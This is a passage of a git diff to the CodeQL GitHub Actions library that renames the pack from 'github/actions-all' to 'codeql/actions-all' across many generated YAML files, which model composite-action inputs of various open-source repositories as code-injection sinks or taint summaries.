a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index bcec913ef7c5..64ff68f38ad1 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index ad5ec2e544fc..c6bdede140fd 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index 9c5c38007bc3..7909d6177768 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 8899c0563e8e..c62ee58c4402 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index f71c818a337e..37efd3a4d40b 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 989eca719606..0a84e79d0243 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 2666233ac877..a026f0529340 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index e8aa6be8fa6a..9b199fb5973c 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index 9bd167413532..13ae8d0f718e 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 3c50e297eb5e..04775e835715 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index d1c181a87075..b0b5918d13fe 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 5b600a4cad42..9879b7e44517 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 65fdcb11a008..e38a5edef48f 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index 08c3ff9cf438..4fa53f367e41 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index c06978549fb9..f3fa29375459 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index eaca3fb9c62b..c66fab9d129b 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index e1c608d3e105..f7e76b691130 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index dc1f7a7b3b88..a216abf29acb 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index a80ce46abc59..396841a6c168 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 15886c2c945d..1a3f383d23b3 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 45769a727d8b..98755665d860 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 9f85415a4825..5849fe5c34f9 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bbfb20551afc..fdc8478bef74 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index f8dc63ee029e..72b9c1c870ef 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index 5ad65dcc0bdb..b8688ab86d29 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 90b6b38b6b01..e2aacd8f10b8 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index 4f1157d862ae..13f28980e573 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index b8ded477dd2f..ee1ef52ecd12 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 87ae2f5d614f..14e60d9cc19b 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 0cfd7be68a34..0516493f6bab 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 54a05620d902..62e64b63b44a 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index e16f3fc74b3f..e132ef1cee39 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index a3f692e7d2f3..90d50a1b757a 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 5acd7348464c..a8b9c41363ea 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 365dd90b1206..75652ed69f99 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index 0d7a06175a59..973007c5490c 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index 4c831ca673af..35a1a09df590 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 40b5f413d661..6b193462780f 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 565bd119df75..448f657d97ec 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index 31157d853d0e..009f4f1ef08e 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index 6208b63b89a9..bcb882872150 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 1073ddd49c18..8476c40ceaf2 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 2b71886a286a..462489a4c512 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index 547bcca2ec97..56b354c870e0 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index e8ed66af89af..9fbb4108868d 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index af1327f7d7fa..5fc85d3530e9 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index 887743c2c703..b0b36e7bd36c 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index ff7e51e477ab..cb2c50f440c0 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/terraform", "*", "input.target-terraform-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml index 55d0ddfba225..7ac5c21a6138 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_vault.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hashicorp/vault", "*", "input.destination", "code-injection", "generated"] - ["hashicorp/vault", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["hashicorp/vault", "*", "input.vault-version", "output.vault-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml index d4c0823c2ece..1276334381da 100644 --- a/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/home-assistant_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["home-assistant/android", "*", "input.lokalise-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml index 7d789ec3ccca..0fc27163dd09 100644 --- a/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/homebrew_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["homebrew/actions", "*", "input.casks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml index 2aa6633d752e..ae994dbad1ae 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/aries-cloudagent-python", "*", "input.TEST_SCOPE", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml index 536e6d914a25..6930bfed43fd 100644 --- a/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml +++ b/ql/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["hyperledger/fabric-samples", "*", "input.ca-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml index 45bfb025ac99..94a802aa36f4 100644 --- a/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml +++ b/ql/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["igniterealtime/openfire", "*", "input.domain", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml 